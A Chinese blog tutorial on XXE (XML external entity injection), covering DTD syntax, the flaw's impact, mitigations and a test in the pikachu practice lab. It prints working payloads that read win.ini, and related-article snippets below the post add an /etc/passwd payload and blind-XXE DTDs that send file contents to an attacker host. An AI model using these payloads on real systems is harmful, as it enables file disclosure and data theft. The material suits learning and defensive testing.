XXE(XML外部实体注入)学习

最新推荐文章于 2024-06-19 17:20:50 发布
最新推荐文章于 2024-06-19 17:20:50 发布
阅读量417 收藏
点赞数
分类专栏: 知识点学习 靶场测试 文章标签: XXE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goodric/article/details/113823934
版权

XXE漏洞

XML外部实体注入(XML External Entity),简称 XXE 漏洞。

XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

XML 文档结构包括 XML 声明、DTD文档类型定义、文档元素。

DTD (Document Type Definition,文档类型定义),用来为 XML 文档定义语法约束。

攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。

即服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

一段常见的 XML 语法结构:
在这里插入图片描述
看起来有点像 HTML 语言,不过 XML 是用来传输和存储数据,HTML 是用来显示数据。

文档类型定义可以是内部声明也可以用外部 DTD。

内部声明 DTD 格式:<!DOCTYPE 根元素 [元素声明]>
引用外部 DTD 格式:<!DOCTYPE 根元素 SYSTEM "文件名">
内部声明实体格式:<!ENTITY 实体名称 "实体的值">
引用外部实体格式:<!ENTITY 实体名称 SYSTEM "URI">

在 DTD 中进行实体声明时,将使用 ENTITY 关键字来声明。
实体是用于定义引用普通文本或特殊字符的快捷方式的变量。
还有其他的一些关键字:

DOCTYPE (DTD 的声明)
SYSTEM 、PUBLIC (外部资源申请)

——
——

XXE漏洞的危害

文件读取
命令执行
内网端口扫描
攻击内网网站
发起 dos 攻击
……

——
——

XXE漏洞的修复

禁止使用外部实体,例如 libxml_disable_entity_loader(true) 。
过滤用户提交的 XML 数据,防止出现非法内容。

——
——

下面通过 pikachu 靶场对 XXE 漏洞进行简单的测试

XXE漏洞测试

打开界面,可以看到一个输入窗口,如果随便输入的话,会回显错误。
在这里插入图片描述

先尝试输入:

<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY b  "text"> ]>
<name>&b;</name>

&b; 是用来将 b 这个实体进行调用,可以以看到 b 实体的内容 “text”成功在前端回显。( b 这个的名称是可以更改的)
在这里插入图片描述
再尝试用file协议读取本地文件 win.ini :

<?xml version="1.0"?>
<!DOCTYPE note [ <!ENTITY b  SYSTEM "file:///C:/Windows/win.ini"> ]>
<name>&b;</name>

可以看到,成功回显文件里的内容。
在这里插入图片描述

Goodric
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
web渗透--25--XXE外部实体注入
武天旭的博客
09-16 1351
1、漏洞描述: XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。 在XML1.0标准里,XML文档结构里定义了实体(entity)这个概念。实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容。如果在这个过程中引入了“污染”源,在对XML文档处理后则可能导致...
XML外部实体注入(XXE)
web1的博客
09-08 488
关键利用点:外部实体 XML是什么? XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的义的 xxe 实体进行了引用 相关实验 1、利用外部实体来检索文件 1.1 访问产品页面,单击“检查库存”,然后在 Burp Suite 中拦截生成的 POST 请求。 1.2 在 XML 声明和stockCheck元素之间插入以下外部实体定义: <!DOCTYPE test [ <!ENTITY xxe SYSTEM "fil
xml外部实体注入XXE
songbai220
12-10 320
XXE(xml外部实体注入) XML External Entity XXE介绍 XXE原理 建立*.dtd <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/1.txt"> <!ENTITY % int "<!ENTITY % send SYSTEM 'http://192.168.0.105:8080?p=%file;'>"> 运维人
XXE漏洞安全-全网最详细讲解】
最新发布
heike_Ch的博客
06-19 973
Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(externalentity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。其中最常见的一种攻击是利用DTD(Document Type。
XML 外部实体注入---XXE
Hi~ 土拨鼠
12-29 378
文章目录XML介绍及用途XML语法规则XML元素介绍XML DTD介绍DTD 声明类型DTD 数据类型DTD 实体介绍XML 注入XXE)产生的原理简单的XXE 漏洞代码编写file_get_contents()函数php封装协议---php://inputsimplexml_load_string()函数XML 注入回显 输出函数XXE 漏洞利用任意文件读取 XML介绍及用途 XML 被设计用来传输和存储数据。XML文档形成了一种树结构,它从"根部"开始,然后扩展到"枝叶"。 XML 允许创作者定义自己
XXE--XML外部实体注入
Y22Lee的博客
04-20 247
简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。
XXE(外部实体注入)详解
2401_82576671的博客
01-23 1943
​ 应用程序在解析XML时没有过滤外部实体的加载,导致加载了恶意的外部文件,造成执行命令、读取文件、扫描内网、攻击内网等危害。​ 运维人员使用了低版本的php,libxml低于2.9.1或者设置了libxml_disable_entity_loader(False)就可以加载外部实体。将文档类型直接放入XML文档中,称为内部定义。内部定义格式:<!DOMCTYPE 根元素 [元素声明]>DOCTYPE note[ #定义跟根节点。
[Web漏洞原理解析]XXE——XML实体注入
slismy的博客
01-23 269
白话Web漏洞 Author:Bell0ne_ XXE-实体注入一、XML是什么?二、使用步骤1.引入库2.读入数据总结 一、XML是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warni
xxe-xml外部实体注入
nigo134的博客
07-27 2948
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
(十二)XML外部实体XXE注入
weixin_43047908的博客
04-16 1784
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
XXE-实体注入学习
weixin_46865273的博客
05-16 353
1、什么是XXE 定义:XXE =XML实体注入 用户输入的数据当作XML代码注入 2、什么是XMLxml是一种标记语言,和html很像的标记语言 xml是用来传输数据的 xml标签是没有被预定义(任何的标签没有任何的意义) XMl是一种纯文本,仅仅是存文本,他不会做任何事情 XML可以自己发明标签 定义:就是存储数据的 XML的结构 1、声明部分 2、DTD部分 (定义变量的部分,可以从外部获取数据然后定义实体变量) = 既然能够从外部获取数据那么我们就可以发起请求,可以操作协议 和SSRF相似 和S
【每天学习一点新知识】XXEXML外部实体注入)从入门到放弃
RexHa的博客
10-29 2131
XML 指可扩展标记语言(EXtensibleMarkupLanguage)XML 是一种标记语言,很类似 HTMLXML 的设计宗旨是传输数据,而非显示数据XML 标签没有被预定义。您需要自行定义标签。XML 被设计为具有自我描述性。XML 是W3C 的推荐标准XML——XML介绍和基本语法_KLeonard的博客-CSDN博客_xml本文介绍了XML语言的历史,以及它的作用和常见的应用。重点介绍了XML文件的语法规则。
XXE 实体注入
guishengyx的博客
04-27 246
服务器因为你的传参发送数据包 我的传参为什么会让服务器发送数据包? 翻译网页功能如何实现 翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户 典型的SSRF:用户传参然后服务器去访问 SSRF危害: 访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...
XXE--外部实体注入
qq_68233961的博客
10-12 317
XXE--XML外部实体注入
XXE外部实体注入
mlws1900的博客
07-06 146
sql结构化查询语言html超文本标记语言xml可扩展的标记语言报错原因:1.xml有且只能有一个根节点2.标签需要成对出现,否则下面就要加正斜杠3.标签不规则嵌套4.属性的值一定要加上单引号或者双引号 实体引用 XML元素,例如 foo 。如果xml元素内部出现如< 的特殊字符,解析就会失败,为了避免这种情况,XML实体引用(entity reference)替换特殊字符。XML预定义五个实体引用,即用< > & ' " 替换 < > & ' ".........
xxe(xml外部实体注入)
weixin_30653097的博客
07-31 208
XXE(xml外部实体注入漏洞) xml实体分为4种,分别是内部实体、参数实体、预定义实体外部实体 内部实体: 在 DTD 或内部子集(即文档中 <!DOCTYPE> 语句的一部分)中声明,在文档中用作引用。在 XML 文档解析过程中,实体引用将由它的表示替代。 预定义实体实体 描述 &quot; 双引号 &apos; 单引号 &a...
xxe外部实体注入
qq_40390383的博客
06-07 223
攻击者可以上传有漏洞的xml 或者可以在原网站的xml文档中添加恶意代码,通过恶意代码或利用上传的xml中的漏洞来对网站服务器进行攻击,这种漏洞叫xxe外部实体注入 防范措施: 1、尽可能的使用简单的数据格式,避免对敏感数据进行序列化(序列化 (Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可...
XXE注入
a3320315的博客
10-28 551
0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD (1)先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>"...
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞(XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全的XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值